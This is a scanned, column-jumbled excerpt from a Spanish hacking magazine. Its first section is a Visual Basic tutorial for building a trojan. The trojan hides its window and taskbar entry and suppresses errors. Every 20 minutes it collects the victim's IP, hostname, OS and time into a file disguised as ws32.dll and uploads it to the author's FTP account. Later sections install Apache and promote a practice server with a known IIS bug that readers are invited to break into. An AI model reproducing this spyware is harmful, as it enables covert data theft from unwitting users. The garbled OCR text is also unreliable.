Print #1, Date pass -la clave de tu cuenta ftp Print #1, Time ftp -La dirección de tu FTP "PUT prueba.txt " & Ya tenemos casi listo nuestro programa, solo Winsock1.LocalHostName & ".txt" .-copia nos queda enviarlo a nuestro FTP, para eso el archivo local especificado(prueba.txt) en el utilizaremos otro control ActiveX diferente, en host remoto especificado, con el nombre del concreto el Microsoft Internet Transfer Control host local y extensión txt. (MSINET.OCX). La forma de añadirlo a nuestro cuadro de herramientas, ya la sabemos, así Tal vez esta línea necesite alguna aclaración que adelante, e incluirlo en nuestro formulario mas, la parte que hemos puesto & Winsock1.LocalHostName & ".txt" Este ocx, permite utilizar dos protocolos ampliamente utilizados, como son, el protocolo & Winsock1.LocalHostName & , utilizamos de transferencia de hipertexto (http), y el el símbolo (&) por que dentro metemos una protocolo de transferencia de archivos (ftp). variable, que es el nombre del host, a la cual le añadimos la terminación txt. De esta manera, Nuestra idea es enviar el archivo prueba.txt a aunque recibamos varios archivos en nuestro una cuenta FTP, necesitamos primero entonces ftp, cada uno tendrá el nombre de la maquina conseguirnos esa cuenta, de esto ya se hablo, en la que corra. pero por si alguien no se acuerda. Llego al hora de probar nuestro programa, Hoy en día, multitud de alojamientos WEB, arranquemos y a los diez segundos mas o nos ofrecen su espacio para que podamos menos deberá de haber subido nuestro archivo colgar nuestras paginas, para subirlas nos prueba.txt a nuestra cuenta ftp. proporcionan una cuenta FTP, solo tenemos que darnos de alta para obtener una clave y Una de las características que queríamos del Página 44 PC PASO A PASO Nº 7
  • 45. IPHXC II - EL TERCER TROYANO DE PC PASO A PASO programa, es que enviara el archivo cada cierto en un ordenador diferente al nuestro, tiempo, si nos hemos fijado, vemos, que el lógicamente "no puede verse", para esto label después de enviar el archivo al llegar a incluiremos en nuestro código la siguiente línea diez segundos, sigue contando, tenemos que en el form_load ponerlo a cero una vez que el archivo ha sido enviado, coloquemos la línea Form1.Visible = False Ti=0 Con esto conseguimos que el programa al ejecutarse no sea "visible", no aparezca ningún Depues de formulario. Inet1.Execute "ftp://USUARIO:PASS@ftp", "PUT Bueno, ya casi esta, podemos todavía hacer prueba.txt " & Winsock1.LocalHostName & ".txt" alguna cosa mas, por ejemplo, el archivo en lugar de llamarse prueba.txt, lo podemos llamar Con esto, logramos iniciar de nuevo la cuenta, como queramos incluida su terminación, un poniendo de nuevo el reloj a cero. nombre pudiera ser ws32.dll, eso ya es cuestión de tu imaginación, aunque vigila de no poner Las cuentas ftp, hay veces que pueden no un nombre de algún archivo que ya exista. funcionar, bien porque estén caídas, no reconozcan las pass o al usuario, estén En nuestro programa, una vez que veamos que bloqueadas, etc. Podemos hacer una prueba, nos funciona, esta claro que nos sobran cosas, elimina alguna letra de tu pass, ejecuta de el label1 nos servia para ir "viendo" como nuevo el programa, veras que aparece una reaccionaba el programa durante su diseño, pantallita indicándonos un fallo, concretamente pero en realidad no nos hace ninguna falta, el 35780, esto nos indica que el servidor FTP podemos eliminarlo, junto con las línea nos ha rechazado por contraseña incorrecta. Tenemos que hacer "algo" que en caso de que Label1.Caption = Ti algún error ocurra, no salga ninguna pantalla de aviso, para eso colocaremos lo siguiente al ATENCION: Si eliminas el control Label1 y no principio de cada evento eliminas la línea anterior, el programa te dará On Error GoTo Error un fallo, puesto que no puede encontrar ese Y al final de cada evento(inmediatamente antes control al que hace referencia el programa. de -End Sub- esta otra Error 424 en tiempo de ejecución: Se Error: requiere un objeto. Con esto lo que hacemos es que si el programa detecta cualquier error,"salte" (GoTo) a la línea Tenemos puesto un tiempo de diez segundos, indicada(Error), que tiene a continuación el es excesivamente corto para nuestro programa, final del evento(End Sub).Es una manera de al menos pongamos 15 minutos, aunque soy evitar "ventanitas" de errores, aunque lo ideal de la opinión, de que una vez seria suficiente, es detectar el error, identificarlo y tratarlo de en este caso como dijo el otro "hágase según forma adecuada. arte", yo voy a colocarlo cada 20 minutos, para eso sustituiré el valor de 1000 que teníamos Si ahora creamos el ejecutable, tendremos un en la línea programa típico de Windows, para nuestra practica esta bien, pero si queremos que "corra" Timer1.Interval = 1000 PC PASO A PASO Nº 7 Página 45
  • 46. IPHXC II - EL TERCER TROYANO DE PC PASO A PASO Por un valor de 60000 Form1.Visible = False 'oculta el formulario ti = 0 'pone a cero el tiempo Timer1.Interval = 60000 Timer1.Interval = 60000 'tiempo para disparar el 'evento timer Con esto conseguimos que el evento timer se 'aproximadamente 60 segundos ejecute cada 60 segundos (aproximadamente) Error: End Sub Sustituimos el valor de 10 de la línea ------------------------------------------------------------ ------------------------ If Ti = 10 Then Private Sub Timer1_Timer() On Error GoTo Error Por 20 Call Command1_Click 'llama al evento click del 'command1 If ti = 20 Then Error: End Sub Ahora y aproximadamente cada veinte minutos se creara y enviara el archivo al ftp. Una vez terminado esto, nos debe de quedar Recordar que el apostrofe (' ) es para introducir un código parecido a este comentarios, estas líneas están en verde, no forman parte del código del programa, es para Dim ti 'declaramos la variable efectos informativos. ------------------------------------------------------------ ------------------ Llegados a este punto, los propósitos que nos Private Sub Command1_Click() marcamos al principio, están casi logrados, y On Error GoTo Error digo casi porque ahora es cuando te toca ti = ti + 1 'se suma 1 hacerlo "crecer", aunque eso es precisamente If ti = 20 Then 'tiempo en minutos lo más bonito, que TU, seas capaz de seguir Open ("ws32.dll") For Output As #1 'crea el archivo adelante, pero no creas que estas solo, tenemos Print #1, "IP del host ", Winsock1.LocalIP 'IP del el foro, seguro que de hay salen las mejores 'host ideas y proyectos, para empezar podemos Print #1, Winsock1.LocalHostName 'nombre del incluir en nuestro programa la rutina de la ' o rd e n a d o r practica nº-1 de la revista 6, con eso Print #1, SysInfo1.OSPlatform 'Plataforma win conseguiremos que en maquinas win95/98/me, Print #1, Date 'fecha permanezca oculto a Control-Alt-Supr, si nuestra Print #1, Time 'hora maquina es winnt, en cualquiera de sus Close #1 'cierra el archivo versiones, pongamos la línea Inet1.Execute "ftp://USUARIO:PASS@ftp", "PUT ws32.dll " & Winsock1.LocalHostName & ".txt" App.TaskVisible = False ti = 0 'pone a cero el tiempo End If En el evento load de nuestro Form, esto no lo Error: oculta de las tares en proceso, para eso End Sub tendríamos que utilizar otro concepto no ------------------------------------------------------------ explicado hasta ahora, que son las apis, y que ------------------------ durante el curso se explicaran. Private Sub Form_Load() On Error GoTo Error Lo ideal es utilizar el menor numero de ActiveX Página 46 PC PASO A PASO Nº 7
  • 47. IPHXC II - EL TERCER TROYANO DE PC PASO A PASO en nuestros proyectos, ¿Por qué?, Tened en La practica n-5 es un código que nos indicara cuenta que para que el programa funcione en si el ordenador esta conectado a Internet. De una maquina diferente a la nuestra, necesita esta manera y mientras este código no informe tener esos archivos en su sistema, o tenemos de que efectivamente el ordenador esta que incluirlos al distribuir nuestro programa. conectado a Internet, no enviara el archivo al "Casi" todos esos ocx mas las librerías ftp, así evitamos la clásica ventanita de petición necesarias, "suelen" estar ya en la mayoría de de conexión a Internet. los ordenadores, cualquier programa tipo P2P y muchas otras aplicaciones los incluyen. Para ayudarnos con nuestros programas, tenemos tanto la ayuda del propio VB, que E n l a p a g i n a w e b e n c o n t ra r e i s u n incluye ejemplos, hasta el msdn, tanto en disco ejemplo(practica 4) para saber la ip del como en la pagina de Microsoft en Internet ordenador sin utilizar ocx, seria un buen ejercicio (http://msdn.microsoft.com/) . el adaptar este código a nuestro proyecto, eliminaríamos un ocx. Hasta aquí la segunda parte de este articulo, espero haber despertado vuestro interés por VB, recordar que esto es solo un pequeño ¿Que más podríamos poner en nuestro p r o g ra m a ( m u y i n c o m p l e t o ) y, s i n proyecto?, .... algunas ideas para entretenernos excesivaspretensiones, para que TU lo sigas este mes, podríamos crear desde un pequeño desarrollando, no te limites a copiarlo solo, FTP (cliente-servidor con el control Winsock), investiga cada uno de los comandos que hemos hasta arrancar alguna "aplicación" ya utilizada utilizado, acude a la ayuda (ya sabes -Cuando en otros números de la revista, como el serv- todo falla.....léete el manual-) , utiliza el foro u o radmin, de acuerdo a alguna condición que para pedir ayuda en tu proyecto, para exponer expresemos, con esto evitaríamos mas entradas y compartir tus logros e ideas. en el regedit para arrancarlas de forma automática. ¿QUIERES COLABORAR CON PC PASO A PASO? PC PASO A PASO busca personas que posean conocimientos de informática y deseen publicar sus trabajos. SABEMOS que muchas personas (quizás tu eres una de ellas) han creado textos y cursos para “consumo propio” o “de unos pocos”. SABEMOS que muchas personas tienen inquietudes periodísticas pero nunca se han atrevido a presentar sus trabajos a una editorial. SABEMOS que hay verdaderas “obras de arte” creadas por personas como tu o yo y que nunca verán la luz. PC PASO A PASO desea contactar contigo! NOSOTROS PODEMOS PUBLICAR TU OBRA!!! SI DESEAS MÁS INFORMACIÓN, envíanos un mail a empleo@editotrans.com y te responderemos concretando nuestra oferta. También necesitamos urgentemente alguien que se ocupe de la publicidad y de la web de esta editorial, para más información envíanos un mail a empleo@editotrans.com PC PASO A PASO Nº 7 Página 47
  • 48. APACHE: UN SERVIDOR WEB EN NUESTRO PC PARTE I: INSTALACION Y ACCESO AL SERVIDOR APACHE Atrévete a montar tu propio Servidor Web. Conoce lo que hay detrás de una página Web. Configura un Servidor Web DESDE CERO!!! La mejor forma de APRENDER es PRACTICANDO :) 1.- Introducción: Conozcámonos. Al finalizar este capítulo tendrás tu propio servidor web y si tienes conexión a Internet, Antes de comenzar me voy a presentar. Soy puedes colocar tu página web en tu servidor David Campoy, y trabajo como gerente de web y darla a conocer al mundo sin que nadie proyectos de Internet en una empresa de se percate de que el servidor lo tienes debajo análisis de datos. El objetivo de este curso es de la mesa. que cualquier lector sin nociones de cómo poner en marcha un servidor web sea capaz 2.- Servidores web de instalar y configurar correctamente el servidor Apache. El curso será 80% práctico, dejando Vamos a explicar de manera rápida y simple un 20% a la parte teórica, siempre es necesario que es un servidor web para aquellos que se conocer algo de culturilla sobre el tema ¿no?. inician en el tema. Si abres el navegador y pones www.hackxcrack.com lo que está Al finalizar el curso serás capaz de instalar el haciendo tu navegador es conectarse a un servidor web Apache, crear sitios virtuales, ordenador que puede estar en cualquier lugar configurar CGI, controlar el registro y estado del mundo, e incluso puede estar alojado debajo del servidor, manipular la seguridad del servidor, de la cama del webmaster. A los pocos segundos utilizar el servidor Proxy, instalación el ordenador al que te has conectado te enviará DNS y mucho más. Si eres nuevo en el la información en formato HTML con imágenes, tema seguro que te sonará a chino todo esto, sonido, flash, ... esto es bueno ya que aprenderás un sin fin de cosas, y lo mejor de todo es que es muy ¿Qué tiene instalado el ordenador de hackxcrack divertido. para que te envíe la página web solicitada?, pues tiene instalado un programa llamado Al tener tu servidor web instalado en tu propio "servidor web", recuerda que el servidor ordenador aprenderás más rápido muchas de es el ordenador que "sirve" la información las lecciones de hackxcrack, prueba y no dejes y el navegador (Internet Explorer, Netscape, de probar en tu ordenador ya que no corres Opera…) es el cliente. Desde este momento riesgo y cuando compruebes que no dejas llamaremos al ordenador que tiene la rastro entonces tu mismo decides donde ..., aplicación de servir las páginas como ejem, vamos a centrarnos. "servidor". Página 48 PC PASO A PASO Nº 7
  • 49. APACHE - SERVIDOR WEB GRATUITO - APACHE - SERVIDOR WEB GRATUITO ! En los anteriores... En los anteriores números de PC PASO A PASO (Los Cuadernos de Hack x Crack) hemos explicado con todo lujo de detalle y en profundidad lo que es un Servidor, un Cliente, el puerto que escucha un Servidor Web (80), un nombre de dominio, un servidor DNS, etc. Para seguir este curso de APACHE no es necesario haber leído los números anteriores de la revista, puesto que todos los cursos se inician desde cero e incluyen las explicaciones pertinentes; pero si realmente quieres sacarle provecho y profundizar en el tema sería bueno que leyeses los números anteriores (el número 1 de hack x crack está disponible en la web www.hackxcrack.com de forma totalmente gratuita). www.dnsstuf f.com Existen muchos servidores web, los más El curso se centrará en el servidor web Apache, conocidos son: Apache, Internet Information las razones son muchas, sigue leyendo y Server (de Microsoft), Netscape Enterprise, comprenderás las razones aunque no Zeus, ... Cada uno de ellos tienen sus descartamos ampliar el curso a otros servidores características propias y lógicamente con bugs web. diferentes (errores de programación, agujeros de seguridad…). Es importante conocer el servidor web que hace funcionar un dominio 3.- La herramienta: Apache pues dependiendo del servidor tendrás que El 65% de los servidores web instalados son aplicar sus bugs si te interesa hacerle una Apache según netcracft.com, personalmente visita para comprobar tus conocimientos de el servidor que mejores resultados me ha dado seguridad adquiridos X) ha sido Apache, además en la web oficial de Apache tienes los códigos por si necesitas En la red existen herramientas online que te adaptar el servidor a tus necesidades. facilitarán la labor de averiguar el servidor web de los dominios, recomendamos Apache es sencillo de instalar y se encuentra www.netcraft.com y www.dnsstuff.com, verás para la mayoría de los sistemas operativos, no cuanta información obtendrás de cada dominio. sólo funciona con todas las versiones de Unix sino que también lo hace con Windows 95, 98, NT Amiga y OS/2. Como te habrás podido imaginar si te haces con la lista de bugs del servidor Apache tienes un 65% (22.045.420, uff un motón) de servidores esperando tu visita ;-) Y lo más importante, Apache es gratuito. Como la mayoría de vosotros tenéis instalado el sistema operativo Windows 98 (54% según www.netcraft.com www.intrastats.com) hemos decidido iniciar el PC PASO A PASO Nº 7 Página 49
  • 50. APACHE - SERVIDOR WEB GRATUITO - APACHE - SERVIDOR WEB GRATUITO curso con la instalación de Apache en este 4.- Comenzamos la instalación sistema operativo. Vamos al grano, comenzamos la instalación del servidor WEB. Antes de comenzar la instalación necesitas: El fichero que te has bajado de la web de Apache, tener la pila TCP/IP instalada en el ordenador, si tienes conexión a Internet en el mismo ordenador donde vas a instalar el Apache no tienes que preocuparte seguro que tienes la pila instalada, en caso contrario primero instala el protocolo TCP/IP. ¿Comenzamos? Paso 1. Pincha sobre el ejecutable apache_1.3.27- win32-x86-no_src.exe, tras varias ventanas indicando que se va proceder a la instalación de apache, la instalación se detiene en una www.intrastats.com ventana que te pregunta que si deseas continuar después de leer el copyrigth de Apache, bla, Para conseguir el servidor Apache que mejor bla, bla, sin dudar "Aceptas" para continuar que bajárselo de la página oficial, con la instalación. www.apache.org, la web está en inglés, pon la siguiente url y te ahorras tener que ir navegando: http://apache.mirrorcentral.com/dist/httpd/bi naries/win32/apache_1.3.27-win32-x86- no_src.exe Paso 2. Ahora pretende que te leas la licencia, está en perfecto inglés, nuestra obligación es decirte que leas los términos y condiciones de uso, ¿alguna vez hemos leído estas parrafadas? , resumiendo, lo que dice es que señales la www.apache.or g opción de que estás de acuerdo con los términos Página 50 PC PASO A PASO Nº 7
  • 51. APACHE - SERVIDOR WEB GRATUITO - APACHE - SERVIDOR WEB GRATUITO y condiciones. Sin dudarlo selecciona la opción Email del administrador: Poner "I accept the terms in the license agreement." webmaster@dominio.com Por último te pregunta como quieres que se realice la puesta en marcha de Apache, por servicio o manual. Si deseas que Apache se ponga en funcionamiento cada vez que enciendas el ordenador y se inicie Windows entonces tienes que seleccionar "Por servicio", en cambio si deseas que Apache se ponga en marcha cuando tú lo desees entonces selecciona manual. De momento selecciona "manual", en otro capitulo explicaremos como ponerlo como servicio una vez que está como manual. Paso 3. De nuevo otra pantalla en anglosajón, aquí te explica ¿que es Apache?, bla, bla, bla, Pues nada ya sabes lo que tienes que hacer, pincha sobre el botón "Next >" para que podamos continuar. Paso 4. En la siguiente ventana ya comienza la verdadera instalación, te pregunta información sobre tu servidor. En estos momentos Paso 5. nuestra intención es instalar Apache para probar en nuestro propio ordenador, el Ahora te pregunta como quieres realizar la siguiente paso será configurar Apache instalación "Completa o Personalizada", elige para que cualquier navegante conectado "Completa", de esta forma instalará por a Internet pueda conectarse al ordenador. completo Apache en el disco duro. Así que los valores que ahora pongamos podemos cambiarlos posteriormente con los Paso 6. reales. Por último te pregunta la carpeta donde quieres La ventana te pregunta: que se instalen los ficheros de Apache, crea un Dominio de red (dominio.com): Para continuar directorio en C: llamado "apache" e instala en con la práctica poner dominio.com, luego ya ese directorio todos los ficheros. Acepta todo cambiaremos los datos con los reales. y comienza la instalación ... Nombre servidor: Poner www.dominio.com PC PASO A PASO Nº 7 Página 51
  • 52. APACHE - SERVIDOR WEB GRATUITO - APACHE - SERVIDOR WEB GRATUITO con el del buen programador: nunca llamarás "A" a la variable "a" ni confundirás un cero con un campo vacío. Si lo entiendes ya sabes de qué hablamos y si no, con nosotros lo aprenderás paso a paso ;) Paso 7. A los pocos segundos y dependiendo de la potencia del ordenador llegarás a la ventana que te comunicará que la instalación se ha realizado con éxito. Acepta la ventana final y ya tienes instalado el servidor Apache en el directorio c:apache 5.- Ejecución del Apache En el menú de Inicio verás una nueva opción "Apache HTTP Server", ejecuta el Apache seleccionando "Start Apache in Console". Verás como se abre una ventana de MSDOS que pone "Apache/1.3.27 (Win32) running ...". No cierres la ventana de MSDOS pues el servidor web funcionará mientras esté abierta, en futuros capítulos veremos como ocultarla. Pulsando "change" puedes crear y seleccionar el directorio donde deseamos instalar apache, en nuestro caso c:apache ! A partir de... A partir de ahora te en cuenta una cosa MUY IMPORTANTE: las mayúsculas NO EXISTEN a la hora de trabajar con los servidores Web. No, no es que les tengamos manía, pero si instalas el servidor en un directorio en mayúsculas o utilizas las mayúsculas para los archivos que crearemos posteriormente acabarás teniendo problemas. ¿Por qué? Podríamos dar muchos motivos, pero me quedo Ventana DOS del APACHE Página 52 PC PASO A PASO Nº 7
  • 53. APACHE - SERVIDOR WEB GRATUITO - APACHE - SERVIDOR WEB GRATUITO Pues ya tienes el servidor en marcha, archivos y directorios necesarios para hacer comprueba que está funcionando. Abre el funcionar el servidor Apache, la estructura tiene navegador que tengas instalado, y pon la que ser igual a la siguiente imagen. siguiente URL: 127.0.0.1, como ya sabes es la dirección Loopback, es una dirección IP interna de la pila TCP/IP que identifica la misma máquina. Es una dirección IP especial que te servirá para hacer pruebas. Si ha funcionado correctamente aparecerá la siguiente página como muestra la imagen: De momento los únicos directorios que te interesan son, conf y htdocs. En el directorio conf se encuentran los archivos de configuración de Apache, el más importante es httpd.conf, prácticamente el 80% del curso trata de cómo manipular los comandos contenidos en este archivo. En el directorio Como puedes ver no ha sido tan difícil y has htdocs pondremos nuestras páginas Web :) convertido tu ordenador en un servidor web, ¿has pensado alojar tu página personal en tu 7.- Tu primera web al mundo ordenador?, ya puedes hacerlo pero recuerda que tendrás que tener las 24 horas del día el Ya que tienes el servidor instalado quieres tener ordenador encendido si deseas que accedan tu primera web y que sea visitada por todo el a cualquier hora. mundo, lo interesante y chulo de verdad es ver como la luz del disco duro se enciende cuando los navegantes comienzan a visitar tu web. ! En anteriores... ¿Quieres que pongamos tu nuevo servidor web disponible al mundo y que sea visitada por los En anteriores números te hemos explicado eso de la IP navegantes? LOOP (dirección Loopback) con detalle :) Lo primero que necesitamos es contenido, es decir, lo que quieres ofrecer, este curso no pretende enseñar HTML, así que suponemos que ya tienes nociones básicas de programación 6.- Estructura de directorios web. Si tienes una web en algún servidor gratuito considera a modo de práctica colocarlo En el directorio C:Apache encontrarás los en tu propio servidor. PC PASO A PASO Nº 7 Página 53
  • 54. APACHE - SERVIDOR WEB GRATUITO - APACHE - SERVIDOR WEB GRATUITO Ahora quieres puedan acceder los navegantes ! Si no tienes... desde cualquier parte del mundo. Lógicamente, para que los navegantes puedan acceder a tu servidor web es necesario que el servidor donde Si no tienes ni idea de crear una página Web, vamos a crear esté funcionando Apache esté conectado a la página Web más sencilla del planeta :) Internet, con una línea ADSL es suficiente ya que te ofrecen una IP fija y si tienes una Abre el Block de Notas de Windows (o cualquier otro conexión de cable /DSL pues mucho mejor. editor de texto sencillo), escribe <BR> Hola a todo el mundo <BR> y guárdalo con el nombre index.txt donde Comprueba que estás conectado a Internet y quieras, por ejemplo en c:temporal. Ahora cambiale el que tienes una IP asignada. Para averiguar la nombre por index.html y se acabó, ya tienes una página IP puedes utilizar el comando "winipcfg" (solo web :) Ahora nos queda hacer que nuestro APACHE sirva para windows 98) o "ipconfig/all" (Windows la página a los clientes :) 2000/XP), puedes ejecutarlo desde la ventana ejecutar o desde el MSDOS. Este comando te aporta información sobre los adaptadores de El contenido de nuestra web (en este caso red (tarjetas de red, modem, ...), verás que nuestra diminuta creación, nuestro index.html) cada adaptador de red tiene asociada un tienes que colocarlo en el directorio identificador IP. c:apachehtdocs. Recuerda llamar a la página principal como index.html o index.htm, es la página principal que se muestra cada vez que se coloca el nombre de dominio en el navegador. Como se ha comentado anteriormente el nombre de la página principal se puede cambiar en el fichero httpd.conf, pero vamos a dejar esto para el próximo capítulo. ! Antes de seguir... Antes de seguir, comprueba que puedes ver la página que hemos creado mediante la dirección Loopback (127.0.0.1). Abre el navegador, introduce la dirección y deberías ver exactamente esto: ! En los números... En los números anteriores de PC PASO A PASO hemos explicado diversos métodos para que descubras tu IP y hemos detallado los pasos. Si no sabes cuál es tu IP llama a tu ISP (Proveedor de Internet) o repasa los anteriores números de esta revista. En mi caso tengo la IP 80.213.111.23, pon TU IP en el navegador y con el servidor web Apache en marcha verás la página index.html (en este Página 54 PC PASO A PASO Nº 7
  • 55. APACHE - SERVIDOR WEB GRATUITO - APACHE - SERVIDOR WEB GRATUITO caso nuestro "hola a todo el mundo" ;) que el proveedor ISP te cambie la IP en cualquier momento vamos a conseguir un dominio y Pues bien, con tu ordenador haciendo de asociarlo a la dirección IP. Nuestro objetivo es servidor web conectado a Internet, cualquier conseguir el servicio de redirección gratis, existen persona desde cualquier parte del mundo que muchos servicios en Internet que ofrecen en este momento ponga tu IP en su navegador redirecciones. Para hacerlo más elegante las verá tu página principal. Como te habrás dado premisas del redireccionador tiene que cumplir: cuenta si tu proveedor de acceso a Internet te No ponga publicidad y que no aparezca la IP cambia la IP, todo tu esfuerzo de dar a conocer en el dominio una vez que ha redireccionado. la IP será en balde ya que nadie volverá a conectarse, es por ello que se recomienda Uno de mis favoritos ya que oculta la IP mediante tener una IP dedicada, si tienes ADSL o cable Frames de HTML y no añade publicidad es el no tendrás problemas por mucho tiempo. redireccionador de w w w. k i c k m e . t o Lo mejor es asociar la IP a un dominio, nadie El registro en www.kickme.to es rápido y sencillo, se aprende las direcciones IP de memoria, está en inglés pero no tiene que ser problema aunque conocí a un chaval que tenía como ¡¡hay tan poco que leer!!. hobby aprenderse todas las IP que encontraba, hay gente para todo... Comenzamos... Paso 1. Visita www.kickme.to Ya tenemos el servidor web Apache, ahora Como verás la página principal tiene poco queremos asociarlo a un dominio para que sea contenido, pues mejor, menos que leer ¿verdad?. fácil de recordar para los navegantes. Pincha en el enlace "Free short URL". ! Si tu ISP... Si tu ISP (Proveedor de Internet) te ha dado una IP DINÁMICA, cada cierto tiempo verás que TU IP cambia. Cada vez que esto suceda deberás asociar de nuevo TU IP al dominio y repetir los pasos que ahora te mostraremos, algo bastante desesperante. En el número 4 te enseñamos cómo conseguir una IP FIJA, te recomendamos encarecidamente que leas PC PASO A PASO número 4 y te liberes de las limitaciones que te impone tu ISP. Como puedes ver, todo lo que hemos ido aprendiendo anteriormente empieza a sernos muy útil (por no decir imprescindible). Paso 2. Enlace registro Vemos otra página con poco contenido, solo 4 8.- Consiguiendo un dominio gratis enlaces, como mola una página tan directa. Venga, pincha en "Signup". Nuestra intención es redirigir al navegante a nuestro servidor, como memorizar una Paso 3. Aceptar términos y condiciones dirección IP es complicada y puede ocurrirte Como siempre y cualquier registro tienes que PC PASO A PASO Nº 7 Página 55
  • 56. APACHE - SERVIDOR WEB GRATUITO - APACHE - SERVIDOR WEB GRATUITO leer la parrafada de los términos y condiciones creada una para estos menesteres, y un para terminar aceptando. Como el color de la password para poder acceder a tu cuenta en página es azul oscuro no ayuda a leer el texto kickme.to. con color negro, y siempre estamos de acuerdo con las condiciones aceptamos sin perder más Paso 6. ¡¡¡Última página!!! tiempo. Aunque es mi obligación decirte que Ahora te pregunta hacia donde tiene que leas los términos y condiciones, ¡¡¡pero hombre, redireccionar www.divxlink.at/divx, como te por lo menos lee y PULSA el botón donde pone estarás imaginando tienes que colocar la IP de "I AGREE" (ACEPTAR)!!! tu servidor web, tu PC (en nuestro caso http://80.213.111.23) Paso 4. Crear nombre de dominio Ya nos vamos acercando a lo interesante y al final. Seleccionamos por ejemplo la url www.divxlinks.at y en el cuadro de al lado pondremos un nombre (nosotros hemos puesto divx) para que cualquier navegante que ponga www.divxlinks.at/divx sea enviado a la IP de nuestro servidor web (nuestro PC). Ya tienes un dominio (un nombre) asociado a tu servidor (tu PC), en vez de promocionar la ip de tu servidor tienes la posibilidad de dar a conocer la url www.divxlink.at/divx, cualquier navegante que ponga esa dirección estará accediendo a tu ordenador. Sencillo ¿verdad?. ¿Qué has aprendido? ! Nosotros hemos... Si eres nuevo en este tema y has seguido el ejemplo práctico seguro que te habrás dado Nosotros hemos puesto divx y por lo tanto tenemos cuenta de todas las posibilidad que te ofrece reservada la dirección (el nombre de dominio) tener un servidor web en casa. Has aprendido www.divxlinks.at/divx. TU NO DEBES poner el mismo como hallar el servidor web de cualquier (divx) puesto que es nuestro y no te será concedido, por lo dominio, has aprendido a instalar un servidor tanto invéntate un nombre, por ejemplo "soyelmejor" y web Apache (con configuración por defecto), obtendrás la dirección www.divxlinks.at/soyelmejor ;) la utilidad del comando winipcfg de windows, a crear un dominio gratis que redireccione a Paso 5. Introducir datos de login y tu servidor web. password. El próximo mes comenzaremos a configurar el Pues ya sabes, tienes que introducir un login servidor Apache. que será una cuenta de email, ten siempre Página 56 PC PASO A PASO Nº 7
  • 57. SERVIDOR DE HXC MODO DE EMPLEO - Hack x Crack ha habilitado un servidor para que puedas A partir de ese momento, cualquiera que acceda a ese realizar las prácticas de hacking. servidor, verá el default.htm modificado para vergüenza del “site” hacheado. Esto es muy genérico pero os dará - Actualmente tiene el BUG del Code / Decode y lo una idea de cómo funciona esto de hackear Webs ;) dejaremos así por un tiempo (bastante tiempo ;) Nuestra intención es ir habilitando servidores a medida que os - Cuando accedas a nuestro servidor mediante el CODE / enseñemos distintos tipos de Hack, pero por el momento DECODE BUG, crea un directorio con tu nombre (el que con un Servidor tendremos que ir tirando (la economía no mas te guste, no nos des tu DNI) en la unidad d: a ser da para mas). posible (que tiene mas espacio libre) y a partir de ahora - En el Servidor corre un Windows 2000 Advanced Server utiliza ese directorio para hacer tus prácticas. Ya sabes, con el IIS de Servidor Web y está en la IP 80.36.230.235. subirnos programitas y practicar con ellos :) - El Servidor tiene tres unidades: Puedes crearte tu directorio donde quieras, no es necesario * La unidad c: --> Con 2GB que sea en d:mellamojuan. Tienes total libertad!!! Una * La unidad d: --> Con 35GB y Raíz del Sistema idea es crearlo, por ejemplo, en * La unidad e: --> CD-ROM d:winntsystem32defaultmellamojuan (ya irás aprendiendo que cuanto mas oculto mejor :) Nota: Raíz del Servidor, significa que el Windows Advanced Server está instalado en esa unidad (la unidad d:) y Es posiblemente la primera vez que tienes la oportunidad concretamente en el directorio por defecto winnt de investigar en un servidor como este sin cometer un Por lo tanto, la raíz del sistema está en d:winnt delito (nosotros te dejamos y por lo tanto nadie te perseguirá). Aprovecha la oportunidad!!! e investiga mientras - El IIS, Internet Information Server, es el Servidor de dure esta iniciativa (que esperamos dure largos años) páginas Web y tiene su raíz en d:inetpub (el directorio por defecto) - En este momento tenemos mas de 600 carpetas de peña que, como tu, está practicando. Así que haznos caso y Nota: Para quien nunca ha tenido instalado el IIS, le será crea tu propia carpeta donde trabajar. extraño tanto el nombre de esta carpeta (d:inetpub) cómo su contenido. Pero bueno, un día de estos os enseñaremos a instalar vuestro propio Servidor Web y detallaremos su funcionamiento. De momento, lo único que hay que saber es que cuando TÚ pongas nuestra IP (la IP de nuestro servidor) en tu navegador, lo que estás haciendo realmente es ir al ! MUY IMPORTANTE... directorio d:Inetpubwwwroot y leer un archivo llamado default.htm. Nota: Como curiosidad, te diremos que APACHE es otro MUY IMPORTANTE!!!!! Por favor, no borres archivos Servidor de páginas Web (seguro que has oído hablar de él). Si tuviésemos instalado el apache, cuando pusieses del Servidor si no sabes exactamente lo que estás haciendo ni nuestra IP en TU navegador, accederías a un directorio borres las carpetas de los demás usuarios. Si haces eso, lo único raíz del Apache (donde se hubiese instalado) e intentarías leer una página llamada index.html que consigues es que tengamos que reparar el sistema servidor y, mientras tanto, ni tu ni nadie puede disfrutar de él :( Explicamos esto porque la mayoría, seguro que piensa en un Servidor Web como en algo extraño que no saben ni Es una tontería intentar “romper” el Servidor, lo hemos puesto donde está ni como se accede. Bueno, pues ya sabes para que disfrute todo el mundo sin correr riesgos, para que todo dónde se encuentran la mayoría de IIS (en Inetpub) y cuál es la página por defecto el mundo pueda crearse su carpeta y practicar nuestros ejercicios. (Inetpubwwwrootdefault.htm). Y ahora, piensa un poco… En el Servidor no hay ni Warez, ni Programas, ni claves, ni nada … ¿Cuál es uno de los objetivos de un hacker que quiere decirle al mundo que ha hackeado una Web? Pues está de nada que “robar”, es un servidor limpio para TI, por lo tanto claro, el objetivo es cambiar (o sustituir) el archivo default.html por uno propio donde diga “hola, soy DIOS cuídalo un poquito y montaremos muchos más :) y he hackeado esta Web” (eso si es un lamer ;) PC PASO A PASO Nº 7 Página 57
